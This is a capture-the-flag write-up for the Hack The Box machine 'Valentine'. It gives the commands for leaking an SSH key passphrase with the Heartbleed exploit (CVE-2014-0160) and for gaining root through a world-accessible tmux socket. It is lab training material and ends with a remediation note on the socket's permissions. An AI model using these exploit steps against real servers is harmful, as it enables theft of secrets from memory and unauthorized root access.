Valentine
An HTTPS service running OpenSSL 1.0.1 is vulnerable to Heartbleed (CVE-2014-0160), which leaks the passphrase for an encrypted RSA private key found in a world-accessible /dev/ directory, granting SSH access as hype.
Overview
Valentine is an easy Linux machine. The web server exposes a hex-encoded encrypted RSA private key in a public /dev/ directory while also running OpenSSL 1.0.1 — vulnerable to CVE-2014-0160 (Heartbleed). Repeatedly triggering the Heartbleed read leak against the HTTPS service recovers the POST body text=heartbleedbelievethehype from server memory — the passphrase for the SSH key — yielding a shell as hype. Root has a persistent tmux session bound to a world-accessible Unix socket at /.devs/dev_sess; attaching to it executes arbitrary commands as root.
Machine Matrix
High Real-Life and CVE scores reflect that Heartbleed is a genuine, weaponized critical vulnerability still found in unpatched production environments; the tmux socket misconfiguration is equally realistic.
Recon
| Port | Service | Notes |
|---|---|---|
| 22/tcp | OpenSSH | SSH — used for foothold |
| 80/tcp | Apache httpd | HTTP — hosts encode/decode app, /dev/ directory listing |
| 443/tcp | Apache httpd (SSL) | HTTPS — OpenSSL 1.0.1, Heartbleed-vulnerable |
1
2
nmap -p- --min-rate=1000 -T4 -Pn 10.10.10.X
nmap -p22,80,443 -sC -sV -Pn 10.10.10.X
The HTTPS service reports OpenSSL 1.0.1, which is the version range affected by Heartbleed. The site theme is Valentine-themed with a bleeding heart image — a direct hint.
Enumeration
Browsing port 80 reveals an encode/decode application. The /dev/ directory is world-accessible and lists two files:
1
2
3
curl -s http://10.10.10.X/dev/
curl -s http://10.10.10.X/dev/hype_key > hype_key.hex
curl -s http://10.10.10.X/dev/notes.txt
hype_key is a hex dump of an AES-128-CBC encrypted RSA private key. notes.txt hints the encoder/decoder is not finished. Decode the hex to recover the PEM:
1
2
cat hype_key.hex | tr -d ' \n' | xxd -r -p > hype.key
head -3 hype.key
The key header confirms encryption (Proc-Type: 4,ENCRYPTED, DEK-Info: AES-128-CBC). A passphrase is needed. Confirm Heartbleed on port 443:
1
nmap -p 443 --script ssl-heartbleed 10.10.10.X
Output: VULNERABLE — the service leaks process memory on demand.
Foothold
The application POSTs text=heartbleedbelievethehype to /encode.php over HTTPS. When that request is in process memory, a Heartbleed read leaks the POST body. Run the public exploit repeatedly until the base64-encoded POST body appears:
1
2
3
for i in $(seq 1 50); do
python2 /usr/share/exploitdb/exploits/multiple/remote/32764.py 10.10.10.X -p 443 2>/dev/null
done | strings | grep -oP '[a-zA-Z0-9+/=]{20,}' | sort | uniq -c | sort -rn | head -20
Decode the recurring base64 candidate to recover the passphrase heartbleedbelievethehype. Verify it against the encrypted key:
1
openssl rsa -in hype.key -passin pass:heartbleedbelievethehype -check 2>&1 | head -1
Output: RSA key ok. Convert to an unencrypted key and SSH as hype:
1
2
3
openssl rsa -in hype.key -passin pass:heartbleedbelievethehype -traditional -out hype_rsa.key
chmod 600 hype_rsa.key
ssh -i hype_rsa.key -o PubkeyAcceptedKeyTypes=+ssh-rsa -o HostKeyAlgorithms=+ssh-rsa [email protected]
Shell lands as uid=1000(hype).
User flag
1
cat ~/user.txt # HTB{...}
Foothold lands directly as hype, who owns user.txt — no lateral movement required.
Privilege Escalation
Enumerate running processes from the hype shell:
1
ps aux | grep tmux
Output shows root is running /usr/bin/tmux -S /.devs/dev_sess. The socket is readable by hype. Send a command to the root tmux server to read the root flag:
1
2
tmux -S /.devs/dev_sess new-window 'cat /root/root.txt > /tmp/r.txt && chmod 777 /tmp/r.txt'
cat /tmp/r.txt
Alternatively, attach interactively:
1
tmux -S /.devs/dev_sess attach
This gives a full interactive root shell. The CWE-732 (incorrect permission assignment for critical resource) on the socket combined with CWE-269 (improper privilege management) is the root cause — the socket should be chmod 700 and owned exclusively by root.
Root flag
1
cat /root/root.txt # HTB{...}
Full root compromise achieved via the world-accessible tmux socket bound to root’s persistent session.